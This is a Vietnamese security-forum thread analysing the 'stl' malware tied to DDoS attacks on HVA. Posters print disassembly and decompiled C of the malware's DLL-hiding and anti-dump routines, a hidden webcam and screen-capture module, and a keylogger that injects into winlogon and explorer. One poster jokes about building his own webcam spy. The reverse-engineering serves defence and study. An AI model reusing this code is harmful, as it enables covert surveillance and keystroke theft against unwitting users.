.text:1000D65B 008         mov     edx, [esi+_LDR_DATA_TABLE_ENTRY.InLoadOrderLinks.Flink]
.text:1000D65D 008         mov     [ecx+_LDR_DATA_TABLE_ENTRY.InLoadOrderLinks.Flink], edx
.text:1000D65F 008         mov     eax, [esi+_LDR_DATA_TABLE_ENTRY.InLoadOrderLinks.Flink]
.text:1000D661 008         mov     ecx, [esi+_LDR_DATA_TABLE_ENTRY.InLoadOrderLinks.Blink]
.text:1000D664 008         mov     [eax+_LDR_DATA_TABLE_ENTRY.InLoadOrderLinks.Blink], ecx
.text:1000D667 008         mov     edx, [esi+_LDR_DATA_TABLE_ENTRY.InMemoryOrderLinks.Blink]
.text:1000D66A 008         mov     eax, [esi+_LDR_DATA_TABLE_ENTRY.InMemoryOrderLinks.Flink]
.text:1000D66D 008         mov     [edx+_LDR_DATA_TABLE_ENTRY.InLoadOrderLinks.Flink], eax
.text:1000D66F 008         mov     ecx, [esi+_LDR_DATA_TABLE_ENTRY.InMemoryOrderLinks.Flink]
.text:1000D672 008         mov     edx, [esi+_LDR_DATA_TABLE_ENTRY.InMemoryOrderLinks.Blink]
.text:1000D675 008         mov     [ecx+_LDR_DATA_TABLE_ENTRY.InLoadOrderLinks.Blink], edx
.text:1000D678 008         mov     eax, [esi+_LDR_DATA_TABLE_ENTRY.InInitializationOrderLinks.Blink]
.text:1000D67B 008         mov     ecx, [esi+_LDR_DATA_TABLE_ENTRY.InInitializationOrderLinks.Flink]
.text:1000D67E 008         mov     [eax+_LDR_DATA_TABLE_ENTRY.InLoadOrderLinks.Flink], ecx
.text:1000D680 008         mov     edx, [esi+_LDR_DATA_TABLE_ENTRY.InInitializationOrderLinks.Flink]
.text:1000D683 008         mov     eax, [esi+_LDR_DATA_TABLE_ENTRY.InInitializationOrderLinks.Blink]
.text:1000D686 008         mov     [edx+_LDR_DATA_TABLE_ENTRY.InLoadOrderLinks.Blink], eax
.text:1000D689 008         mov     ecx, [esi+_LDR_DATA_TABLE_ENTRY.HashLinks.Blink]
.text:1000D68C 008         mov     edx, [esi+_LDR_DATA_TABLE_ENTRY.HashLinks.Flink]
.text:1000D68F 008         mov     [ecx+_LDR_DATA_TABLE_ENTRY.InLoadOrderLinks.Flink], edx
.text:1000D691 008         mov     eax, [esi+_LDR_DATA_TABLE_ENTRY.HashLinks.Flink]
.text:1000D694 008         mov     ecx, [esi+_LDR_DATA_TABLE_ENTRY.HashLinks.Blink]
.text:1000D697 008         mov     [eax+_LDR_DATA_TABLE_ENTRY.InLoadOrderLinks.Blink], ecx
.text:1000D69A 008         movzx   edx, [esi+_LDR_DATA_TABLE_ENTRY.FullDllName.Length]
.text:1000D69E 008         mov     eax, [esi+_LDR_DATA_TABLE_ENTRY.FullDllName.Buffer]
.text:1000D6A1 008         push    edx                     ; size_t
.text:1000D6A2 00C         push    0                       ; int
.text:1000D6A4 010         push    eax                     ; void *
.text:1000D6A5 014         call    _memset                 ; Zero the FullDllName
.text:1000D6AA 014         push    48h
.text:1000D6AC 018         push    0
.text:1000D6AE 01C         push    esi
.text:1000D6AF 020         call    _memset                 ; Zero memory _LDR_DATA_TABE_ENTRY of this DLL
.text:1000D6B4 020         add     esp, 18h
.text:1000D6B7 008         mov     eax, 1
.text:1000D6BC 008         pop     esi
.text:1000D6BD 004         pop     ecx
.text:1000D6BE 000         retn
.text:1000D6BE     HideDLL endp
Sau khi hàm HideDll này được thực thi, với các tool bình thường, chúng ta sẽ không thấy cversions.2.db hay dao360.dll.mui được load lên. 2. Code anti-dump dll memory xuống disk: Code:
.text:1000DF80     ; void __cdecl IncSizeOfImageFieldInLDR()
.text:1000DF80     IncSizeOfImageFieldInLDR proc near      ; CODE XREF: MaintThreadProc:loc_1000A82Ep
.text:1000DF80 000         mov     eax, large fs:30h       ; eax = PEB
.text:1000DF86 000         mov     eax, dword ptr [eax+_PEB_LDR_DATA.InLoadOrderModuleList] ; eax = Ldr: _PEB_LDR_DATA
.text:1000DF89 000         mov     eax, [eax+_LDR_DATA_TABLE_ENTRY.InMemoryOrderLinks.Blink] ; InLoadOrderModuleList : _LIST_ENTRY
.text:1000DF8C 000         add     [eax+_LDR_DATA_TABLE_ENTRY.SizeOfImage], 3686400 ; _LDR_DATA_TABLE_ENTRY: 0x20 offset = SizeOfImage
.text:1000DF93 000         retn
.text:1000DF93     IncSizeOfImageFieldInLDR endp
Hai kỹ thuật trên đã có từ lâu lắm rồi, được public nhiều trên Phrack magazine và Vxnetlux...., nói chung là đạo code, không có gì mới, nhưng vẫn hiệu quả với các tool, người dùng bình thường trong việc che giấu cversions.2.db hay dao360.dll.mui khỏi TaskManager, ListDll, Process Explorer....]]>
/hvaonline/posts/list/39641.html#248066 /hvaonline/posts/list/39641.html#248066 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. http://woodmann.com/collaborative/tools/index.php/HideToolz. Có thể sẽ có vài AVs báo HideToolz là rootkit, không sao ! Chỉnh option của HideToolz như hình:
Run Wireshark hay SmartSniff, hide các process đó, xong. Code của stl sẽ không detect ra ! Tiếp tục nào các bạn, vì cversions.2.db là một dll, nên chúng ta không thể nào run nó trực tiếp được. Chúng ta chép một mình cversions.2.db qua máy ảo (VM), vào thư mục C:\Temp chẵng hạn. Run Wireshark (hay SmartSniff) trên máy ảo với protect = HideToolz như trên. Config Wireshark để capture vào một pcap file nào đó, rồi start capture. Sau đó ra ngoài command line, gõ lệnh: Code:
rundll32.exe C:\Temp\cversions.2.db, ABCDE
Do cversions.2.db không export hàm nào, nên rundll32.exe sẽ quăng ra môt message box, kệ nó, đừng click OK, bỏ đó đi uống ăn cơm. Các thread của cversions.2.db đã bắt đầu chạy rồi đó, Wireshark sẽ capture sau khi các thread đó ngủ dậy. Quan sát Wireshark tới khi nào các bạn thấy cversions.2.db kết nối tới các host kia. Click OK để kết thúc rundll32.exe (sẽ tự kill luôn cversions.2.db). Mở file pcap thu được bằng Wireshark với 010 Editor, mở template PCAPTemplate.bt, xor data gởi đi với 0x1D, các bạn sẽ thấy cversions.2.db đã gởi đi thứ gì từ mấy các bạn.
Một phần data trên máy em sau khi em xor:
Bà con chú ý cái hình after xor nhé, dòng bôi đõ đầu tiên là volume serial number của C: (%HomeDrive%), dòng bôi đỏ thứ hai là MAC address của card mạng, dòng bôi đỏ thứ 3 là Model và Serial Number của Hard Disk1 (master). Bà con ai biết, chữ "Bai" là gì, của ngôn ngữ nào không ??? Chữ "Bai" này em thấy lạ lắm, vì em biết coder Việt ta không bao giờ dùng chữ "Bai" để mô tả harddisk type và serial number ???
Trong khi đó, với dao360.dll.mui thì code lấy harddisk type và serialnumber không có (chưa dùng WMI), nên chuỗi format chỉ là: Code:
[%d.%d.%d] - SP %d - PT %d - SM %d - HD %0.8X - NIC %s
]]>
/hvaonline/posts/list/39641.html#248070 /hvaonline/posts/list/39641.html#248070 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
Bà con ai biết, chữ "Bai" là gì, của ngôn ngữ nào không ??? Chữ "Bai" này em thấy lạ lắm, vì em biết coder Việt ta không bao giờ dùng chữ "Bai" để mô tả harddisk type và serial number ???  
Tiếng Việt không dấu dịch ra là: Bài, Bái, Bại, Bải Tàu dịch ra là 100 Anh dịch ra là : tạm biệt anh TQN, :P ]]>
/hvaonline/posts/list/39641.html#248077 /hvaonline/posts/list/39641.html#248077 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#248080 /hvaonline/posts/list/39641.html#248080 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.
Vì vậy, các bạn search hay Google Translate từ "Bai" đó sai hết rồi, hì hì ;) Với các bạn đã code C/C++, nhìn hàm format string đó các bạn hiểu ngay là: Code:
[%d.%d.%d]: [dwMajorVersion.dwMinorVersion.dwBuildNumber]
SP: wServicePackMajor
PT: wProductType
SM: wSuiteMask
HD: Volume serial number of %HomeDrive%
NIC: MAC address
Bai: ???????
Và các bạn còn nhớ cái name pipe tên Nanned không trong bộ Dao360.dll.mui ? PS: Đoạn code HideDll của stl coder có bug, nên nó không hide được cversions.2.db hay dao360.dll.mui trong list DLLs panel view của Process Explorer hay Process Hacker... Em đố bạn nào tìm ra được bug đó, nếu tìm ra, CN này đi nhậu ;) Bữa nhậu này đáng lý phải bắt stl coder trả tiền, cho chừa cái tội copy code mà không hiểu, không test -:-) Các bạn thử đoán xem, stl coder lấy list các software, các update trên máy victim để làm gì ? Thâm hiểm lắm đấy !]]>
/hvaonline/posts/list/39641.html#248085 /hvaonline/posts/list/39641.html#248085 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
Và các bạn còn nhớ cái name pipe tên Nanned không trong bộ Dao360.dll.mui ? PS: Đoạn code HideDll của stl coder có bug, nên nó không hide được cversions.2.db hay dao360.dll.mui trong list DLLs panel view của Process Explorer hay Process Hacker... Em đố bạn nào tìm ra được bug đó, nếu tìm ra, CN này đi nhậu ;) Bữa nhậu này đáng lý phải bắt stl coder trả tiền, cho chừa cái tội copy code mà không hiểu, không test -:-) Các bạn thử đoán xem, stl coder lấy list các software, các update trên máy victim để làm gì ? Thâm hiểm lắm đấy ! 
Không thấy đả động gì đến MemoryOrder list, không lẽ bug ở đây :D, bản Process Explorer 11.x cũ của em nó không hiện cversion2.db trong list module thật.]]>
/hvaonline/posts/list/39641.html#248090 /hvaonline/posts/list/39641.html#248090 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. Các bạn thử đoán xem, stl coder lấy list các software, các update trên máy victim để làm gì ? Thâm hiểm lắm đấy !  Cái này theo suy nghĩ nông cạn của em là để xem mọi người hay dùng phần mềm gì, những tool nào là cần thiết mà nhiều người sử dụng --> để tiện anti / update malware và đính kèm vài chú malware vào những tool phổ biến này. Và để làm được điều đó thì nhất thiết coder của stl phải lấy nhũng thông tin này. Chỉ vấn đề anti debug và detect các tool khác thôi em thấy mấy anh stl này code rất cực khổ với anh N rồi mà giờ còn làm thêm cái trò này, mấy anh stl hình như không biết mệt. Còn việc lấy thông tin về phần cứng như HDD serial, card, Modem mạng thì em cũng không biết mấy ảnh làm gì nữa ?.Hổng lẽ mấy ảnh định chuyển hướng sang kinh doanh linh kiện máy tính và đang tìm hiểu thị trường =)) ]]> /hvaonline/posts/list/39641.html#248093 /hvaonline/posts/list/39641.html#248093 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
Các bạn thử đoán xem, stl coder lấy list các software, các update trên máy victim để làm gì ? Thâm hiểm lắm đấy !  
Thì thống kê xem cái software nào hiện đang được dùng nhiều, hay máy mục tiêu đang chạy software gì để mà còn "núp bóng" chứ :D]]>
/hvaonline/posts/list/39641.html#248112 /hvaonline/posts/list/39641.html#248112 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
Và các bạn còn nhớ cái name pipe tên Nanned không trong bộ Dao360.dll.mui ? PS: Đoạn code HideDll của stl coder có bug, nên nó không hide được cversions.2.db hay dao360.dll.mui trong list DLLs panel view của Process Explorer hay Process Hacker... Em đố bạn nào tìm ra được bug đó, nếu tìm ra, CN này đi nhậu ;) Bữa nhậu này đáng lý phải bắt stl coder trả tiền, cho chừa cái tội copy code mà không hiểu, không test -:-) Các bạn thử đoán xem, stl coder lấy list các software, các update trên máy victim để làm gì ? Thâm hiểm lắm đấy ! 
Các đoạn code trên có nhiều mục đích lắm. Thứ nhất là tặng malware vào phần mềm crk hay sử dụng. Thứ 2 là giờ đây hack không chỉ là phần mềm, mà còn là phần cứng, các lỗ hổng trong phần cứng mới là nhiều và thường ít được biết tới và ít quan tâm hơn là phần mềm, cũng như khó để xử lý hơn. Sau khi biết victim sử dụng loại phần mềm và phần cứng nào thì càng tăng ưu thế cũng như khả năng dễ tấn công theo nhiều hướng khác nhau. PS: Hôm nay vietnamnet vào rất nhanh, có lẽ DDOS đã tạm dừng, cộng với việc tăng số server để chống đỡ DDOS nên giờ vietnamnet vào nhanh như chớp.]]>
/hvaonline/posts/list/39641.html#248113 /hvaonline/posts/list/39641.html#248113 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#248138 /hvaonline/posts/list/39641.html#248138 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#248139 /hvaonline/posts/list/39641.html#248139 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#248149 /hvaonline/posts/list/39641.html#248149 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#248186 /hvaonline/posts/list/39641.html#248186 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.
Export 3 hàm sau:
Hàm select video capture driver sẽ select video driver đầu tiên hợp lệ, vd: Webcam, camera an ninh.... Code:
int __stdcall GetCaptureDriver()
{
    UINT wDriverIndex; // [sp+4h] [bp-414h]@1
    WCHAR wzVer[252]; // [sp+8h] [bp-410h]@1
    WCHAR wzName[254]; // [sp+200h] [bp-218h]@1

    memset(&szName[1], 0, 0x1F2u);
    memset(&szVer[1], 0, 0x1F2u);

    for (wDriverIndex = 0; wDriverIndex < 9; ++wDriverIndex)
    {
        if (capGetDriverDescriptionW(wDriverIndex, szName, 500, szVer, 500))
        {
            return wDriverIndex;
        }
    }

    return -1;
}
Hàm export D3DRMColorGetRed sẽ trả về cho caller TRUE hay FALSE. FALSE khi máy victim không có video capture driver. Code:
BOOL __stdcall D3DRMColorGetRed()
{
    return GetCaptureDriver() != -1;
}
Hàm D3DRMColorGetGreen sẽ được caller gọi để bắt đầu video capture, tham số đưa vào là filename của file image capture Code:
BOOL __stdcall D3DRMColorGetGreen(LPWSTR pwzImgCaptured)
{
    HANDLE hCaptureThread;

    g_hDesktop = CreateDesktopW(L"Defau1t1", 0, 0, 1u, 0x10000000u, 0);
    if (L"Defau1t1")  //  => bug của stl coder, may mà luôn luôn đúng
    {
        hCaptureThread = CreateThread(0, 0, CaptureThreadProc, 0, 0, 0);
        WaitForSingleObject(hCaptureThread, INFINITE);
        CloseDesktop(g_hDesktop);
        wcscpy(pwzImgCaptured, g_wzCaptureFileName);
    }
    
    return 0; // => stl coder bug: không CloseHandle(hCaptureThread);
}
CaptureThreadProc sẽ create tiếp 2 thread, một thread để force kill capture video window, 1 thread thực hiện capture Code:
int __cdecl VideCaptureThreadProc()
{
    int result;
    int captureDriverIndex;

    SetThreadDesktop(g_hDesktop);
    captureDriverIndex = GetCaptureDriver();
    if (captureDriverIndex == -1)
    {
        result = -1;
    }
    else
    {
        VideoCapture(g_wzCaptureFileName, captureDriverIndex, 640, 480, 10);
        result = 0;
    }
    return result;
}
640, 480 là kích thước capture video window, 10 là số loop count của message loop của capture video window. Code:
signed int __cdecl VideoCapture(WCHAR *pwzDibFile, UINT capDriverIdx, int nWidth, int nHeight, int loopCount)
{
    DWORD dwWndLong; 
    MSG Msg;
    HWND hwndCapture;

    HWND hDskWnd = GetDesktopWindow();

    hwndCapture = j_capCreateCaptureWindowW(0, 0x40000000u, 0, 0, nWidth, nHeight, hDskWnd, 0);
    if (hwndCapture)
    {
        dwWndLong = GetWindowLongW(hwndCapture, GWL_EXSTYLE);
        SetWindowLongW(hwndCapture, GWL_EXSTYLE, (dwWndLong | 0x80080) & 0xFFFBFFFF);

        ShowWindow(hwndCapture, SW_SHOWNORMAL);

        SetLayeredWindowAttributes(hwndCapture, 0, 1, LWA_ALPHA); // capture window sẽ transparent, không thấy trên màn hình

        if (IsWindow(hwndCapture))
            SendMessageW(hwndCapture, WM_CAP_DRIVER_CONNECT, capDriverIdx, 0);

        if (IsWindow(hwndCapture))
            SendMessageW(hwndCapture, WM_CAP_SET_SCALE, TRUE, 0); // scale preview image to 640x480

        if (IsWindow(hwndCapture))
            SendMessageW(hwndCapture, WM_CAP_SET_PREVIEWRATE, 60, 0); // 1s chụp 1 frame

        if (IsWindow(hwndCapture))
            SendMessageW(hwndCapture, WM_CAP_SET_PREVIEW, TRUE, 0); // start preview mode

        for (i = 0; i < loopCount; ++i)
        {
            GetMessageW(&Msg, hwndCapture, 0, 0);
            DispatchMessageW(&Msg);
            TranslateMessage(&Msg);
        }

        if (IsWindow(hwndCapture))
            SendMessageW(hwndCapture, WM_CAP_FILE_SAVEDIBW, 0, pwzDibFile); // save to bmp file

        if (IsWindow(hwndCapture))
            SendMessageW(hwndCapture, WM_CAP_DRIVER_DISCONNECT, capDriverIdx, 0);

        DestroyWindow(hwndCapture);
        result = 1;
    }
    else
    {
        result = 0;
    }

    return result;
}
Hàm export cuối cùng chỉ làm nhiệm vụ capture screen và lưu vào file input parameter Code:
UINT __stdcall D3DRMColorGetBlue(LPWSTR pwzImgFile)
{
    WCHAR wzTempFileName[520];
    HGDIOBJ hBmp;
    int flag, xStart, yStart, nWidth, nHeight;

    memset(wzTempFileName, 0, 1040);
    CreateWmpTempFileName(wzTempFileName);
    hBmp = ScreenCapture(flag, xStart, yStart, nWidth, nHeight);
    if (hBmp)
    {
        SaveToJPGFile(hBmp, wzTempFileName, 75);
        wcscpy(pwzImgFile, wzTempFileName);
    }
    return 0;
}
Trong file này, stl coder code bug tá lã, quên CloseHandle cho các hThread nhiều lắm. Máy ai mà chạy lâu lâu thì chỉ có nước die, cạn hết kernel handles. Cách dùng KillThreadProc để kill Video capture window rất ngớ ngẫn, vì vậy các bạn mới thấy stl coder gọi IsWindow liên tục như vậy, chắp vá phải không bạn stl ? Và một điều nữa là các bạn có thấy không, stl coder ít dùng các class std::string, CString,... cứ khoái declare các buffer bự tổ chãng rồi memset tá lã hết ! Chỉ vài đoạn code C vậy thôi là dung nhan "mát mẽ" của các em gái victim bị chụp hết. Đơn giản ha ! Kiểu này em cũng viết một con mới được, tìm một cái FTP server nữa là có hình "nóng" xem mệt xỉu. Và bà con IT nam thì rút kn, khi ngồi máy thì đừng ở trần, ngồi đàng hoàng nhen =)) ]]>
/hvaonline/posts/list/39641.html#248188 /hvaonline/posts/list/39641.html#248188 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#248222 /hvaonline/posts/list/39641.html#248222 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. Name VA Index ------- --- ------- DllCanUnloadNow 10002680 1 DllGetClassObject 10002680 2 DllRegisterServer 10002160 3 DllUnregisterServer 10002680 4   Trong 4 hàm trên, chỉ có hàm DllRegisterServer là có code, còn toàn bộ là empty function, chỉ return FALSE. Khi hardkbd.dll được mèo què khác của stl load lên, ngay trong hàm DllMain, code chỉ call 1 hàm duy nhất, tôi gọi là MainProc. Hàm MainProc sẽ làm rất nhiều việc, lấy version của Windows, tuỳ theo version của Win mà sẽ create các thread tương ứng. Các thread này kiểm tra Exe parent mà nó được load. Tương ứng với services.exe, winlogon.exe, logonui.exe, explorer.exe sẽ có các thread khác nhau. Sau đó MainProc sẽ remote load ieframe.ocx (cũng chính là hardkbd.dll) vào Explorer.exe. Code:
int __cdecl MainProc()
{
    int osVer;
    HANDLE hProcess;
    BOOL notWinLogonExe;
    DWORD ThreadId;
    WCHAR wzPath[260];

    osVer = GetVersion();
    memset(wzPath, 0, 520);

    hProcess = GetCurrentProcess();
    GetModuleFileNameExW(hProcess, 0, wzPath, 260);
    PathStripPathW(wzPath);

    if (!_wcsicmp(wzPath, L"services.exe"))
    {
        ThreadId = 0;
        CreateThread(0, 0, ThreadProcInServicesExe, 0, 0, &ThreadId);
    }

    notWinLogonExe = _wcsicmp(wzPath, L"winlogon.exe");
    if (osVer == 6)
    {
        if (notWinLogonExe)
            goto @@IsExplorer;
        ThreadId = 0;
        CreateThread(0, 0, ThreadProcInWinLogon, 0, 0, &ThreadId);
        CreateThread(0, 0, InjectExplorerThreadProc, 0, 0, &ThreadID);
    }

    if (!notWinLogonExe)
    {
        ThreadId = 0;
        InitMSDataVXDFile_And_LoadIEFrameOCX_And_HookKeyboard();
        CreateThread(0, 0, InjectExplorerThreadProc, 0, 0, &ThreadId);
    }

    if (!_wcsicmp(wzPath, L"logonui.exe"))
    {
        CreateThread(0, 0, ThreadProcInLogOnUIExe, 0, 0, &ThreadID);
    }

@@IsExplorer:
    if (!_wcsicmp(wzPath, L"explorer.exe"))
    {
        ThreadId = 0;
        CreateThread(0, 0, ThreadProcInExplorer, 0, 0, &ThreadId);
    }

    return -1;
Hàm InitMSDataVXDFile_And_LoadIEFrameOCX_And_HookKeyboard() sẽ create file msdata.vxd trong thư mục System32 Code:
int InitMSDataVXDFile_And_LoadIEFrameOCX_And_HookKeyboard()
{
    DWORD ThreadId;
    CHAR szMsdataVxdPath[260];

    if (S_OK != SHGetFolderPathA(0, CSIDL_SYSTEM), 0, 0, szMsdataVxdPath)
        return -1;

    sprintf_s(szMsdataVxdPath, 260, "%s\\msdata.vxd", szMsdataVxdPath);
    g_hFile_Msdatavxd = CreateMSDataVxdFile(szMsdataVxdPath),
    if (-1 == g_hFile_Msdatavxd)
        return -1;

    SetWindowsHookExA(WH_KEYBOARD, KbdHookProc, 0, GetCurrentThreadId(););
    write_string_after_xor_with_0x6F_to_msdata_vxd_file(0x12, g_hFile_Msdatavxd, "\r\n[Logon Window]\r\n");

    ThreadId = 0;
    CreateThread(0, 0, RemoteLoadIEFrameOCX, 0, 0, &ThreadId);

    return 0;
}
Hàm KbdHookProc chính là hàm DllRegisterServer: Code:
HRESULT __stdcall KbdHookProc(int code, WPARAM wparam, LPARAM lparam)
{
    DWORD len;
    HWND hwnd;
    int p;
    char ach;
    WORD nSc1, nSc2;
    HANDLE hFile;
    char *psz;
    SYSTEMTIME SystemTime;
    char szText[1500];
    char szWndText[1024];

    if ((code != 0)|| !(~(lparam >> 31) & 1) || wparam == VK_CAPITAL || wparam == VK_SHIFT || wparam == VK_LSHIFT)
        return CallNextHookEx(0, code, wparam, lparam);

    hFile = g_hmsdatavxdfile;

    if (wparam == VK_RETURN)
    {
        psz = "\r\n";
        len = 2;
    }
    else if (wparam == VK_SPACE)
    {
        psz = L" ";
        len = 1;
    }
    else if (wparam == VK_LWIN || wparam == VK_RWIN)
    {
        psz = "[Windows]";
        len = 9;
    }
    else if (wparam == VK_TAB)
    {
        psz = L"\t";
        len = 1;
    }
    else
    {
        hwnd = GetForegroundWindow();
        if (hwnd != g_hForegroundWndLast)
        {
            memset(szWndText, 0, 1024);
            GetWindowTextA(hwnd, szWndText, 1024);

            memset(szText, 0, 1500);
            GetLocalTime(&SystemTime);
            sprintf_s(szText, 1500, "\r\n\r\n[%s] - [%.4i/%.2i/%.2i %.2i/%.2i/%.2i]:\r\n",
                szWndText, SystemTime.wYear, SystemTime.wMonth, SystemTime.wDay,
                SystemTime.wHour, SystemTime.wMinute, SystemTime.wSecond);

            if (!write_string_after_xor_with_0x6F_to_msdata_vxd_file(strlen(szText), hFile, szText))
                return -1;

            g_hForegroundWndLast = hwnd;
        }

        GetKeyboardState(&g_abKeyState);
        nSc1 = MapVirtualKeyA(wparam, 0);
        if (ToAscii(wparam, v8, &g_abKeyState, &g_Char, 0) == 1)
        {
            if (g_Char > VK_SPACE)
            {
                wsprintfA(g_szKey, "%c", g_Char);
                len = strlen(g_szKey);
                psz = g_szKey;
            }
            nSc2 = MapVirtualKeyA(wparam, 0);
            if (GetKeyNameTextA(v9 << 16, g_szKey, 16) > 0)
            {
                len = strlen(g_szKey);
                psz = g_szKey;
            }
        }
        else
        {
            nSc1 = MapVirtualKeyA(wparam, 0);
            if (GetKeyNameTextA(nScancode << 16, g_szKey, 16) > 0)
            {
                len = strlen(g_szKey);
                psz = g_szKey;
                hFile = g_hmsdatavxdfile;
            }
        }
    }

    write_string_after_xor_with_0x6F_to_msdata_vxd_file(len, hFile, psz);
    return CallNextHookEx(0, code, wparam, lparam);
}
]]>
/hvaonline/posts/list/39641.html#248343 /hvaonline/posts/list/39641.html#248343 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. Code:
memset(&wcex, 0, 0x30u);
    wcex.cbSize = 48;
    wcex.lpfnWndProc = MSDataWndProc;
    wcex.hInstance = GetModuleHandleA(0);
    wcex.lpszClassName = "msdata";
    RegisterClassExA(&wcex);
    CreateWindowExA(0,  "msdata", "msdata", 0, 0, 0, 0, 0, HWND_MESSAGE, 0, hInstance, 0);
   ..........
Và code ASM của MSDataWndProc: Code:
.text:10001888     ON_WM_CREATE:                           ; DATA XREF: .text:WMHandlerTableo
.text:10001888 01C     mov     eax, [ebp+hWnd]
.text:1000188B 01C     push    0Ch                         ; cbSize
.text:1000188D 020     push    1                           ; uiNumDevices
.text:1000188F 024     lea     ecx, [ebp+rawInputDevices]
.text:10001892 024     push    ecx                         ; pRawInputDevices
.text:10001893 028     mov     dword ptr [ebp+rawInputDevices.usUsagePage], 60001h
.text:1000189A 028     mov     [ebp+rawInputDevices.dwFlags], RIDEV_INPUTSINK
.text:100018A1 028     mov     [ebp+rawInputDevices.hwndTarget], eax
.text:100018A4 028     call    ds:RegisterRawInputDevices
.text:100018A4
.text:100018AA 01C     test    eax, eax
.text:100018AC 01C     jnz     @@Return_0
.text:100018AC
.text:100018B2 01C     or      eax, 0FFFFFFFFh
.text:100018B5 01C     pop     edi
.text:100018B6 018     pop     esi
.text:100018B7 014     pop     ebx
.text:100018B8 010     mov     esp, ebp
.text:100018BA 004     pop     ebp
.text:100018BB 000     retn    10h
.text:100018BB
.text:100018BE     ; ---------------------------------------------------------------------------
.text:100018BE
.text:100018BE     ON_WM_INPUT:                            ; CODE XREF: MSDataWndProc+21j
.text:100018BE                                             ; DATA XREF: .text:WMHandlerTableo
.text:100018BE 01C     mov     edi, [ebp+cbSize]
.text:100018C1 01C     mov     ebx, ds:GetRawInputData
.text:100018C7 01C     push    16                          ; cbSizeHeader
.text:100018C9 020     lea     edx, [ebp+cbSize]
.text:100018CC 020     push    edx                         ; pcbSize
.text:100018CD 024     push    0                           ; pData
.text:100018CF 028     push    RID_INPUT                   ; uiCommand
.text:100018D4 02C     push    edi                         ; hRawInput
.text:100018D5 030     call    ebx ; GetRawInputData
.text:100018D5
.text:100018D7 01C     mov     eax, [ebp+cbSize]
.text:100018DA 01C     push    eax                         ; dwBytes
.text:100018DB 020     push    0                           ; dwFlags
.text:100018DD 024     call    ds:GetProcessHeap
.text:100018DD
.text:100018E3 024     push    eax                         ; hHeap
.text:100018E4 028     call    ds:HeapAlloc
.text:100018E4
.text:100018EA 01C     push    10h                         ; cbSizeHeader
.text:100018EC 020     lea     ecx, [ebp+cbSize]
.text:100018EF 020     push    ecx                         ; pcbSize
.text:100018F0 024     mov     esi, eax
.text:100018F2 024     push    esi                         ; pData
.text:100018F3 028     push    RID_INPUT                   ; uiCommand
.text:100018F8 02C     push    edi                         ; hRawInput
.text:100018F9 030     call    ebx ; GetRawInputData
.text:100018F9
.text:100018FB 01C     test    eax, eax
.text:100018FD 01C     jz      short @@FreeMem_And_Return_0
.text:100018FD
.text:100018FF 01C     cmp     [esi+RAWINPUTHEADER.dwType], RIM_TYPEKEYBOARD
.text:10001902 01C     jnz     short @@FreeMem_And_Return_0
.text:10001902
.text:10001904 01C     cmp     [esi+RAWINPUT.data.keyboard.Message], WM_KEYFIRST
.text:1000190B 01C     jnz     short @@FreeMem_And_Return_0
.text:1000190B
.text:1000190D 01C     movzx   ecx, [esi+RAWINPUT.data.keyboard.VKey] ; uCode
.text:10001911 01C     call    save_key_to_msdata_vxd_file
.text:10001911
.text:10001916 01C     cmp     eax, 0FFFFFFFFh
.text:10001919 01C     jnz     short @@FreeMem_And_Return_0
.text:10001919
.text:1000191B 01C     mov     edx, [ebp+hWnd]
.text:1000191E 01C     push    edx                         ; hWnd
.text:1000191F 020     call    ds:DestroyWindow
.text:1000191F
.text:10001925
.text:10001925     @@FreeMem_And_Return_0:                 ; CODE XREF: MSDataWndProc+9Dj
.text:10001925                                             ; MSDataWndProc+A2j
.text:10001925                                             ; MSDataWndProc+ABj
.text:10001925                                             ; MSDataWndProc+B9j
.text:10001925 01C     push    esi                         ; lpMem
.text:10001926 020     push    0                           ; dwFlags
.text:10001928 024     call    ds:GetProcessHeap
.text:10001928
.text:1000192E 024     push    eax                         ; hHeap
.text:1000192F 028     call    ds:HeapFree
.text:1000192F
.text:10001935 01C     xor     eax, eax
.text:10001937 01C     pop     edi
.text:10001938 018     pop     esi
.text:10001939 014     pop     ebx
.text:1000193A 010     mov     esp, ebp
.text:1000193C 004     pop     ebp
.text:1000193D 000     retn    10h
.text:1000193D
.text:10001940     ; ---------------------------------------------------------------------------
.text:10001940
.text:10001940     ON_WM_DESTROY:                          ; CODE XREF: MSDataWndProc+21j
.text:10001940                                             ; DATA XREF: .text:WMHandlerTableo
.text:10001940 01C     mov     eax, g_hFile_Msdatavxd
.text:10001945 01C     cmp     eax, 0FFFFFFFFh
.text:10001948 01C     jz      short @@Quit
.text:10001948
.text:1000194A 01C     push    eax                         ; hObject
.text:1000194B 020     call    ds:CloseHandle
.text:1000194B
.text:10001951
.text:10001951     @@Quit:                                 ; CODE XREF: MSDataWndProc+E8j
.text:10001951 01C     push    0                           ; nExitCode
.text:10001953 020     call    ds:PostQuitMessage
.text:10001953
.text:10001959
.text:10001959     @@Return_0:                             ; CODE XREF: MSDataWndProc+4Cj
.text:10001959 01C     xor     eax, eax
.text:1000195B 01C     pop     edi
.text:1000195C 018     pop     esi
.text:1000195D 014     pop     ebx
.text:1000195E 010     mov     esp, ebp
.text:10001960 004     pop     ebp
.text:10001961 000     retn    10h
.text:10001961
.text:10001964     ; ---------------------------------------------------------------------------
.text:10001964
.text:10001964     ON_WM_QUERYENDSESSION:                  ; CODE XREF: MSDataWndProc+21j
.text:10001964                                             ; DATA XREF: .text:WMHandlerTableo
.text:10001964 01C     call    SavePowerOffTime
.text:10001964
.text:10001969 01C     push    0                           ; uExitCode
